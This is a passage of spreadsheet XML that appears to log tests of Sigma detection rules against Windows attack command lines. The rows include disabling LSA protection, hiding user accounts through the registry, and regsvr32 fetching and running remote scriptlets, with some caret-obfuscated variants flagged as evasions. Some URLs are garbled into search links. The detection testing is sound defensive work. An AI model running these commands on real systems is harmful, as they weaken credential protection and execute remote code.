        </is>
      </c>
      <c r="C4140" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D4140" s="44" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E4140" s="44" t="inlineStr">
        <is>
          <t>reg.exe  add  "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"  /v RunAsPPL  /d 0</t>
        </is>
      </c>
      <c r="F4140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4140" s="44" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J4140" s="44" t="n"/>
      <c r="K4140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4141" ht="15.75" customHeight="1" s="42">
      <c r="A4141" s="44" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B4141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_no_flag_or_dll_execution</t>
        </is>
      </c>
      <c r="C4141" s="44" t="inlineStr">
        <is>
          <t>RegAsm.EXE Execution Without CommandLine Flags or Files</t>
        </is>
      </c>
      <c r="D4141" s="44" t="inlineStr">
        <is>
          <t>651f87f7-12db-47f9-84c5-f27b081b94b6</t>
        </is>
      </c>
      <c r="E4141" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe</t>
        </is>
      </c>
      <c r="F4141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4141" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments (a7c3d773-caef-227e-a7e7-c2f13c622329); RegAsm.EXE Execution Without CommandLine Flags or Files (651f87f7-12db-47f9-84c5-f27b081b94b6)</t>
        </is>
      </c>
      <c r="J4141" s="44" t="n"/>
      <c r="K4141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4142" ht="15.75" customHeight="1" s="42">
      <c r="A4142" s="44" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B4142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C4142" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D4142" s="44" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E4142" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /regfile:C:\PerfLogs\test.reg C:\Windows\Temp\..\Temp\test.dll</t>
        </is>
      </c>
      <c r="F4142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4142" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J4142" s="44" t="n"/>
      <c r="K4142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4143" ht="15.75" customHeight="1" s="42">
      <c r="A4143" s="44" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B4143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C4143" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D4143" s="44" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E4143" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set "SUSPICIOUS_DIR=\Windows\Temp" &amp;&amp; call C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe %SUSPICIOUS_DIR%\test.dll"</t>
        </is>
      </c>
      <c r="F4143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4143" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J4143" s="44" t="n"/>
      <c r="K4143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4144" ht="15.75" customHeight="1" s="42">
      <c r="A4144" s="44" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B4144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C4144" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D4144" s="44" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E4144" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Temp\test.dll"</t>
        </is>
      </c>
      <c r="F4144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4144" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J4144" s="44" t="n"/>
      <c r="K4144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4145" ht="15.75" customHeight="1" s="42">
      <c r="A4145" s="44" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B4145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C4145" s="44" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D4145" s="44" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E4145" s="44" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F4145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4145" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Hiding User Account Via SpecialAccounts Registry Key - CommandLine (9ec9fb1b-e059-4489-9642-f270c207923d)</t>
        </is>
      </c>
      <c r="J4145" s="44" t="n"/>
      <c r="K4145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4146" ht="15.75" customHeight="1" s="42">
      <c r="A4146" s="44" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B4146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C4146" s="44" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D4146" s="44" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E4146" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "REG a^dd "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0"</t>
        </is>
      </c>
      <c r="F4146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4146" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Hiding User Account Via SpecialAccounts Registry Key - CommandLine (9ec9fb1b-e059-4489-9642-f270c207923d)</t>
        </is>
      </c>
      <c r="J4146" s="44" t="n"/>
      <c r="K4146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4147" ht="15.75" customHeight="1" s="42">
      <c r="A4147" s="44" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B4147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C4147" s="44" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D4147" s="44" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E4147" s="44" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" -v AtomicOperator$ /t REG_DWORD /d 0x0</t>
        </is>
      </c>
      <c r="F4147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4147" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J4147" s="44" t="n"/>
      <c r="K4147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4148" ht="15.75" customHeight="1" s="42">
      <c r="A4148" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C4148" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D4148" s="44" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E4148" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u /i:"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" /n scrobj.dll</t>
        </is>
      </c>
      <c r="F4148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4148" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4148" s="44" t="n"/>
      <c r="K4148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4149" ht="15.75" customHeight="1" s="42">
      <c r="A4149" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C4149" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D4149" s="44" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E4149" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u "/i":"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" scrobj.dll</t>
        </is>
      </c>
      <c r="F4149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4149" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4149" s="44" t="n"/>
      <c r="K4149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4150" ht="15.75" customHeight="1" s="42">
      <c r="A4150" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C4150" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D4150" s="44" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E4150" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\system32\regsvr32.exe /s /u /^i:"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" scrobj.dll"</t>
        </is>
      </c>
      <c r="F4150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4150" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4150" s="44" t="n"/>
      <c r="K4150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4151" ht="15.75" customHeight="1" s="42">
      <c r="A4151" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_http_ip_pattern</t>
        </is>
      </c>
      <c r="C4151" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP IP Pattern</t>
        </is>
      </c>
      <c r="D4151" s="44" t="inlineStr">
        <is>
          <t>2dd2c217-bf68-437a-b57c-fe9fd01d5de8</t>
        </is>
      </c>
      <c r="E4151" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u /i:"[http://192.0.2.10/test.sct](https://www.google.com/search?q=http://192.0.2.10/test.sct)" scrobj.dll</t>
        </is>
      </c>
      <c r="F4151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4151" s="44" t="inlineStr">
        <is>
          <t>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4151" s="44" t="n"/>
      <c r="K4151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4152" ht="15.75" customHeight="1" s="42">
      <c r="A4152" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_http_ip_pattern</t>
        </is>
      </c>
      <c r="C4152" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP IP Pattern</t>
        </is>
      </c>
      <c r="D4152" s="44" t="inlineStr">
        <is>
          <t>2dd2c217-bf68-437a-b57c-fe9fd01d5de8</t>
        </is>
      </c>
      <c r="E4152" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\system32\regsvr32.exe /s /u /i^:[http://192.0.2.10/test.sct](https://www.google.com/search?q=http://192.0.2.10/test.sct) scrobj.dll"</t>
        </is>
      </c>
      <c r="F4152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4152" s="44" t="inlineStr">
        <is>
          <t>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4152" s="44" t="n"/>
      <c r="K4152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4153" ht="15.75" customHeight="1" s="42">
      <c r="A4153" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_http_ip_pattern</t>
        </is>
      </c>
      <c r="C4153" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP IP Pattern</t>
        </is>
      </c>
      <c r="D4153" s="44" t="inlineStr">
        <is>
          <t>2dd2c217-bf68-437a-b57c-fe9fd01d5de8</t>
        </is>
      </c>
      <c r="E4153" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u "/i:[http://192.0.2.10/test.sct](https://www.google.com/search?q=http://192.0.2.10/test.sct)" scrobj.dll</t>
        </is>
      </c>
      <c r="F4153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4153" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4153" s="44" t="n"/>
      <c r="K4153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4154" ht="15.75" customHeight="1" s="42">
      <c r="A4154" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C4154" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D4154" s="44" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E4154" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u "/i:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct)" scrobj.dll</t>
        </is>
      </c>
      <c r="F4154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4154" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4154" s="44" t="n"/>
      <c r="K4154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4155" ht="15.75" customHeight="1" s="42">
      <c r="A4155" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C4155" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D4155" s="44" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E4155" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\system32\regsvr32.exe /s /u /i^:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct) scrobj.dll"</t>
        </is>
      </c>
      <c r="F4155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4155" s="44" t="inlineStr">
        <is>
          <t>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4155" s="44" t="n"/>
      <c r="K4155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4156" ht="15.75" customHeight="1" s="42">
      <c r="A4156" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C4156" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D4156" s="44" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E4156" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u /i:HTTPS://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct) scrobj.dll</t>
        </is>
      </c>
      <c r="F4156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4156" s="44" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Potentially Suspicious Regsvr32 HTTP/FTP Pattern (867356ee-9352-41c9-a8f2-1be690d78216); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4156" s="44" t="n"/>
      <c r="K4156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4157" ht="15.75" customHeight="1" s="42">
      <c r="A4157" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_remote_share</t>
        </is>
      </c>
      <c r="C4157" s="44" t="inlineStr">
        <is>
          <t>Suspicious Regsvr32 Execution From Remote Share</t>
        </is>
      </c>
      <c r="D4157" s="44" t="inlineStr">
        <is>
          <t>88a87a10-384b-4ad7-8871-2f9bf9259ce5</t>
        </is>
      </c>
      <c r="E4157" s="44" t="inlineStr">
        <is>
          <t>regsvr32.exe "\192.0.2.10\share\test.dll"</t>
        </is>
      </c>
      <c r="F4157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4157" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4157" s="44" t="n"/>
      <c r="K4157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4158" ht="15.75" customHeight="1" s="42">
      <c r="A4158" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_remote_share</t>
        </is>
      </c>
      <c r="C4158" s="44" t="inlineStr">
        <is>
          <t>Suspicious Regsvr32 Execution From Remote Share</t>
        </is>
      </c>
      <c r="D4158" s="44" t="inlineStr">
        <is>
          <t>88a87a10-384b-4ad7-8871-2f9bf9259ce5</t>
        </is>
      </c>
      <c r="E4158" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "regsvr32.exe \^192.0.2.10\share\test.dll"</t>
        </is>
      </c>
      <c r="F4158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4158" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4158" s="44" t="n"/>
      <c r="K4158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4159" ht="15.75" customHeight="1" s="42">
      <c r="A4159" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_remote_share</t>
        </is>
      </c>
      <c r="C4159" s="44" t="inlineStr">
        <is>
          <t>Suspicious Regsvr32 Execution From Remote Share</t>
        </is>
      </c>
      <c r="D4159" s="44" t="inlineStr">
        <is>
          <t>88a87a10-384b-4ad7-8871-2f9bf9259ce5</t>
        </is>
      </c>
      <c r="E4159" s="44" t="inlineStr">
        <is>
          <t>net use Z: \192.0.2.10\share &amp;&amp; regsvr32.exe Z:\test.dll</t>
        </is>
      </c>
      <c r="F4159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4159" s="44" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J4159" s="44" t="n"/>
      <c r="K4159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4160" ht="15.75" customHeight="1" s="42">
      <c r="A4160" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C4160" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D4160" s="44" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E4160" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s C:\Windows\Temp\..\Temp\AllTheThingsx86.dll</t>
        </is>
      </c>
      <c r="F4160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4160" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location (9525dc73-0327-438c-8c04-13c0e037e9da); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4160" s="44" t="n"/>
      <c r="K4160" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4161" ht="15.75" customHeight="1" s="42">
      <c r="A4161" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C4161" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D4161" s="44" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E4161" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s C:\Windows\Temp\AllTheThingsx86.dll</t>
        </is>
      </c>
      <c r="F4161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4161" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location (9525dc73-0327-438c-8c04-13c0e037e9da); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4161" s="44" t="n"/>
      <c r="K4161" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4162" ht="15.75" customHeight="1" s="42">
      <c r="A4162" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C4162" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D4162" s="44" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E4162" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\syswow64\regsvr32.exe /s C:\Windows\Te^mp\AllTheThingsx86.dll"</t>
        </is>
      </c>
      <c r="F4162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4162" s="44" t="b">
        <v>1</v>
